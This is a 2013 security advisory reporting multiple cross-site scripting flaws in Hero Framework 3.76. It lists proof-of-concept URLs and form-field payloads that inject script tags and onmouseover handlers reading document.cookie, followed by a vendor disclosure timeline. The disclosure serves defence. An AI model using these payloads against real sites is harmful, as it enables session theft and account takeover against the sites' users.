Hero Framework 3.76 Cross Site Scripting

2013.01.11
Credit: L@usch
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Advisory: Hero Framework 3.76 Multiple Cross-site Scripting vulnerabilities Advisory ID: SSCHADV2012-023 Author: L@usch Affected Software: Successfully tested on Hero Framework 3.76 Vendor URL: http://www.heroframework.com/ Vendor Status: informed =========================== Vulnerability Description =========================== Hero Framework 3.76 is prone to multiple Cross-Site Scripting vulnerabilities ====================== PoC-Exploit ====================== http://[target]/hero_os/users/login?errors=true&username='"></style></script><script>alert(document.cookie)</script> http://[target]/hero_os/search?q=" onmouseover%3dalert(/XSS/) %3d" http://[target]/hero_os/users/login?errors=true&username=" onmouseover%3dalert(/XSS/) %3d" // POST-Parameter Username: '"><script>alert(document.cookie)</script> First Name: '"><script>alert(document.cookie)</script> Last Name: '"><script>alert(document.cookie)</script> ====================== Solution ====================== - - ====================== Disclosure Timeline ====================== 16-Dec-2012 - informed via contact form 16-Dec-2012 - feedback from vendor ====================== Credits ====================== Vulnerabilities found and advisory written by Stefan Schurtz. ====================== References ====================== http://www.darksecurity.de/advisories/2012/SSCHADV2012-023.txt

References:

http://www.darksecurity.de/advisories/2012/SSCHADV2012-023.txt


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top